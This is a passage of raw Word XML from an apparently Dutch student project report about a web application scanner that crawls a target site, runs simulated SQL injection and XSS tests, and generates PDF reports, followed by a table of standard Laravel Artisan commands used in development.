        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251969536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53540D57" wp14:editId="225FD7D7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4372610</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>788035</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1638935" cy="2867660"/>
            <wp:effectExtent l="0" t="0" r="12065" b="2540"/>
            <wp:wrapSquare wrapText="bothSides"/>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data voorziening Web Applicatie Scanner.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1638935" cy="2867660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="002C1130">
        <w:t>Een van de hoofd</w:t>
      </w:r>
      <w:r w:rsidR="00F6629E">
        <w:t xml:space="preserve">functies van de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F6629E">
        <w:t>Crawler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F6629E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002843EF">
        <w:t xml:space="preserve">is de Scanner voorzien met data. </w:t>
      </w:r>
      <w:r w:rsidR="00B70E9C">
        <w:t>De Scanner gebruikt de data om gesimuleerde aanvallen te verrich</w:t>
      </w:r>
      <w:r w:rsidR="003071EE">
        <w:t xml:space="preserve">ten op het doelwit, de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003071EE">
        <w:t>web applicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003071EE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003F6AAA">
        <w:t xml:space="preserve">De Scanner voert in de scope van dit project twee aanvallen uit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F6AAA">
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F6AAA">
        <w:t xml:space="preserve"> en XSS aanvallen. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F6AAA">
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F6AAA">
        <w:t xml:space="preserve"> wordt gebruikt om </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003F6AAA">
        <w:t>SQL kwetsbaarheden</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003F6AAA">
        <w:t xml:space="preserve"> te identificeren en XSS voor </w:t>
      </w:r>
      <w:r w:rsidR="00F60837">
        <w:t xml:space="preserve">cross-site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F60837">
        <w:t>scripting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F6AAA">
        <w:t xml:space="preserve"> kwetsbaarheden.</w:t>
      </w:r>
      <w:r w:rsidR="002F6663">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00350F3D">
        <w:t>De Scanner voorziet</w:t>
      </w:r>
      <w:r w:rsidR="003362E8">
        <w:t xml:space="preserve"> weer</w:t>
      </w:r>
      <w:r w:rsidR="00350F3D">
        <w:t xml:space="preserve"> de Rapport generator met data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AE30B1" w14:textId="11D725D4" w:rsidR="000E5C78" w:rsidRDefault="000E5C78" w:rsidP="006E3A79">
      <w:r>
        <w:t>Rapporteren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608EBF81" w14:textId="58C87565" w:rsidR="000E5C78" w:rsidRDefault="00E26F01" w:rsidP="006E3A79">
      <w:r>
        <w:t xml:space="preserve">Deze feature genereert een rapport op basis van de gevonden </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>XSS kwetsbaarheden</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E82AEF">
        <w:t xml:space="preserve">De geïdentificeerde kwetsbaarheden worden op een formele wijze gedocumenteerd in het rapport met gedetailleerde informatie over het doelwit en advies over welke vervolg stappen de klant kan nemen. Het rapport wordt in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E82AEF">
        <w:t>PDF formaat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E82AEF">
        <w:t xml:space="preserve"> gegenereerd. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4E396E" w14:textId="5AF9F738" w:rsidR="00DD7A64" w:rsidRDefault="00DD7A64" w:rsidP="006E3A79"/>
    <w:p w14:paraId="1DA4EE4E" w14:textId="60E3F7A8" w:rsidR="00C12D8A" w:rsidRPr="003D45FB" w:rsidRDefault="00C12D8A" w:rsidP="006E3A79"/>
    <w:p w14:paraId="38603E4F" w14:textId="6B9F893E" w:rsidR="00982F21" w:rsidRDefault="00982F21" w:rsidP="006E3A79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424E7638" w14:textId="62610E3A" w:rsidR="00C13F1D" w:rsidRDefault="00EC49B6">
      <w:pPr>
        <w:rPr>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252011520" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="11B9FEA4" wp14:editId="2D61B1E2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3609975</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>80645</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="572135" cy="193040"/>
                <wp:effectExtent l="0" t="0" r="12065" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="252" name="Text Box 252"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="572135" cy="193040"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0BCA4FBB" w14:textId="7311C6EF" w:rsidR="00CE4BB5" w:rsidRPr="0082182A" w:rsidRDefault="00CE4BB5" w:rsidP="00EE1758">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 4.8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9FEA4" id="Text Box 252" o:spid="_x0000_s1087" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:284.25pt;margin-top:6.35pt;width:45.05pt;height:15.2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waCDsCAAB5BAAADgAAAGRycy9lMm9Eb2MueG1srFRLj9owEL5X6n+wfC8BdukjIqwoK6pKaHcl&#10;qPZsHJtYsj2ubUjor+/YIWy77anqxRnPjOfxfTOZ33VGk5PwQYGt6GQ0pkRYDrWyh4p+263ffaQk&#10;RGZrpsGKip5FoHeLt2/mrSvFFBrQtfAEg9hQtq6iTYyuLIrAG2FYGIETFo0SvGERr/5Q1J61GN3o&#10;Yjoevy9a8LXzwEUIqL3vjXSR40speHyUMohIdEWxtphPn899OovFnJUHz1yj+KUM9g9VGKYsJr2G&#10;umeRkaNXf4QyinsIIOOIgylASsVF7gG7mYxfdbNtmBO5FwQnuCtM4f+F5Q+nJ09UXdHpbEqJZQZJ&#10;2okuks/QkaRDhFoXSnTcOnSNHRqQ6UEfUJka76Q36YstEbQj1ucrvikcR+Xsw3RyM6OEo2ny6WZ8&#10;m/EvXh47H+IXAYYkoaIe6cuostMmRCwEXQeXlCuAVvVaaZ0uybDSnpwYUt02KopUIr74zUvb5Gsh&#10;verNvUbkWblkSf32fSUpdvsuIzS7HZreQ31GLDz08xQcXytMv2EhPjGPA4Tt41LERzykhraicJEo&#10;acD/+Js++SOvaKWkxYGsaPh+ZF5Qor9aZDxN7yD4QdgPgj2aFWDjE1w3x7OID3zUgyg9mGfclWXK&#10;giZmOeaqaBzEVezXAneNi+UyO+GMOhY3dut4Cj3AvOuemXcXkiKy+wDDqLLyFVe9bw/68hhBqkxk&#10;ArZHETlKF5zvzNZlF9MC/XrPXi9/jMVPAAAA//8DAFBLAwQUAAYACAAAACEA/xGs1N8AAAAJAQAA&#10;DwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VIXBB1GoiJQpwKWriVQ0vVsxubJCJeR7bT&#10;pH/PcoLjap5m3par2fbsbHzoHEpYLhJgBmunO2wkHD7f73NgISrUqndoJFxMgFV1fVWqQrsJd+a8&#10;jw2jEgyFktDGOBSch7o1VoWFGwxS9uW8VZFO33Dt1UTltudpkghuVYe00KrBrFtTf+9HK0Fs/Djt&#10;cH23Obxt1cfQpMfXy1HK25v55RlYNHP8g+FXn9ShIqeTG1EH1kvIRJ4RSkH6BIwAkeUC2EnC48MS&#10;eFXy/x9UPwAAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAA&#10;AAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCH7BoIOwIAAHkEAAAOAAAAAAAA&#10;AAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQD/EazU3wAAAAkBAAAPAAAA&#10;AAAAAAAAAAAAAJMEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAnwUAAAAA&#10;" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0BCA4FBB" w14:textId="7311C6EF" w:rsidR="00CE4BB5" w:rsidRPr="0082182A" w:rsidRDefault="00CE4BB5" w:rsidP="00EE1758">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.8</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D4547" w14:textId="529784A3" w:rsidR="00423183" w:rsidRDefault="00161972" w:rsidP="00F96873">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc491022083"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.4.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00423183">
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00423183">
        <w:t xml:space="preserve"> Line Interface</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="2FFDFEB4" w14:textId="77777777" w:rsidR="00355841" w:rsidRDefault="00355841"/>
    <w:p w14:paraId="712FF009" w14:textId="63A6D3CA" w:rsidR="00B57C6F" w:rsidRPr="00DC2182" w:rsidRDefault="00B57C6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC2182">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Introductie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267839D6" w14:textId="77777777" w:rsidR="00086D88" w:rsidRDefault="000A2836">
      <w:r>
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Line Interface is het opdrachten </w:t>
      </w:r>
      <w:r w:rsidR="00C13F46">
        <w:t>prompt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> van </w:t>
      </w:r>
      <w:r w:rsidR="00C13F46">
        <w:t>de Web Applicatie Scanner</w:t>
      </w:r>
      <w:r w:rsidR="00894606">
        <w:t>. Vanuit daar worden alle opdrachten uitgevoerd</w:t>
      </w:r>
      <w:r w:rsidR="00EB1D09">
        <w:t xml:space="preserve"> zoals de scan opdrachten. </w:t>
      </w:r>
      <w:r w:rsidR="00FD6933">
        <w:t>De commando</w:t>
      </w:r>
      <w:r w:rsidR="007B1064">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00FD6933">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="007B1064">
        <w:t xml:space="preserve">worden met de web Framework van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007B1064">
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B1064">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA79D3">
        <w:t xml:space="preserve">gedefinieerd en kunnen in een Terminal uitgevoerd worden. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D2385D">
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D2385D">
        <w:t xml:space="preserve"> komt aangelev</w:t>
      </w:r>
      <w:r w:rsidR="00A45D78">
        <w:t xml:space="preserve">erd met de CLI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A45D78">
        <w:t>Artisan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A45D78">
        <w:t xml:space="preserve"> Console, deze CLI ondersteund de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A45D78">
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A45D78">
        <w:t xml:space="preserve"> ontwikkelaars bij het ontwikkelen van </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A45D78">
        <w:t>web applicaties</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A45D78">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0000586E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC6F7C">
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BC6F7C">
        <w:t xml:space="preserve"> heeft een aantal commando’s die ik heb gebruikt bij het ontwikkelen van de Web Applicatie Scanner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46300BDE" w14:textId="6D4F9FE8" w:rsidR="006D1BD2" w:rsidRDefault="006D1BD2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Artisan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Console</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9206" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="469"/>
        <w:gridCol w:w="3634"/>
        <w:gridCol w:w="5103"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C54E3" w14:paraId="3BFDCC48" w14:textId="77777777" w:rsidTr="002C54E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59E33895" w14:textId="1B3A2B1B" w:rsidR="002C54E3" w:rsidRDefault="002C54E3">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17D86D5D" w14:textId="37A1EBE3" w:rsidR="002C54E3" w:rsidRDefault="002C54E3">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Artisan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> commando’s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64E839C9" w14:textId="2A482E73" w:rsidR="002C54E3" w:rsidRDefault="002C54E3">
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C54E3" w14:paraId="0950B339" w14:textId="77777777" w:rsidTr="002C54E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D603601" w14:textId="2194597E" w:rsidR="002C54E3" w:rsidRDefault="002C54E3">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1292AE17" w14:textId="7CFE9327" w:rsidR="002C54E3" w:rsidRDefault="002C54E3">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>artisan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> dump-autoload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="202D6A38" w14:textId="0101764D" w:rsidR="002C54E3" w:rsidRDefault="002C54E3">
            <w:r>
              <w:t>Genereerd een nieuwe autoload bestand (Glossar,18)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C54E3" w14:paraId="7B108170" w14:textId="77777777" w:rsidTr="002C54E3">
        <w:trPr>
          <w:trHeight w:val="264"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FB47CDF" w14:textId="5339F078" w:rsidR="002C54E3" w:rsidRDefault="002C54E3">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77F8531E" w14:textId="7F04A17F" w:rsidR="002C54E3" w:rsidRDefault="002C54E3">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>artisan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>migrate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C9995B2" w14:textId="1AD28CC7" w:rsidR="002C54E3" w:rsidRDefault="002C54E3">
            <w:r>
              <w:t>Maakt de database aan gebaseerd op de ontworpen schema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C54E3" w14:paraId="5046E1DB" w14:textId="77777777" w:rsidTr="002C54E3">
        <w:trPr>
          <w:trHeight w:val="208"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52DC7B5A" w14:textId="70CB002F" w:rsidR="002C54E3" w:rsidRDefault="002C54E3">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4342933C" w14:textId="7A275B0A" w:rsidR="002C54E3" w:rsidRDefault="002C54E3">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>artisan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>make:migration</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> [tabel]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C172DD9" w14:textId="67CA2105" w:rsidR="002C54E3" w:rsidRDefault="002C54E3">
            <w:r>
              <w:t xml:space="preserve">Maakt een nieuwe tabel aan in </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>de</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> schema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C54E3" w14:paraId="6525AEBB" w14:textId="77777777" w:rsidTr="002C54E3">
        <w:trPr>
          <w:trHeight w:val="208"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A9E0531" w14:textId="36D30E0D" w:rsidR="002C54E3" w:rsidRDefault="002C54E3">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72F67301" w14:textId="6F751B1C" w:rsidR="002C54E3" w:rsidRDefault="002C54E3">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>artisan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>make:command</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> [commando]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5103" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73A6E82B" w14:textId="3A67B60C" w:rsidR="002C54E3" w:rsidRDefault="002C54E3">
            <w:r>
              <w:t>Maakt in het project een nieuwe commando Class aan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C441000" w14:textId="76C46737" w:rsidR="006D1BD2" w:rsidRDefault="00CD1094">
      <w:r>
        <w:t>Tabel 4.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D78F29D" w14:textId="7E3EB9CC" w:rsidR="00134755" w:rsidRPr="00DC2182" w:rsidRDefault="00134755">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC2182">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Custom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC2182">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E06D8E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Artisan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC2182">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> commando’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C0C10B" w14:textId="1032D8A7" w:rsidR="00D95507" w:rsidRDefault="006D1BD2">
      <w:r>
        <w:t xml:space="preserve">Voor het gebruik van de Web Applicatie Scanner is het niet nodig om gebruik te maken van deze standaard commando’s die meegeleverd worden met de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Artisan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Console.</w:t>
      </w:r>
      <w:r w:rsidR="006762B1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00460D43">
        <w:t>Artisan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00460D43">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000126C8">
        <w:t>heeft een commando</w:t>
      </w:r>
      <w:r w:rsidR="00CD1094">
        <w:t xml:space="preserve"> (tabel 4.9, 4)</w:t>
      </w:r>
      <w:r w:rsidR="000126C8">
        <w:t xml:space="preserve"> waarmee je</w:t>
      </w:r>
      <w:r w:rsidR="00CD1094">
        <w:t xml:space="preserve"> een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E06D8E">
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E06D8E">
        <w:t xml:space="preserve"> Class kunnen genereren.</w:t>
      </w:r>
      <w:r w:rsidR="00E92CC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A42BD7">
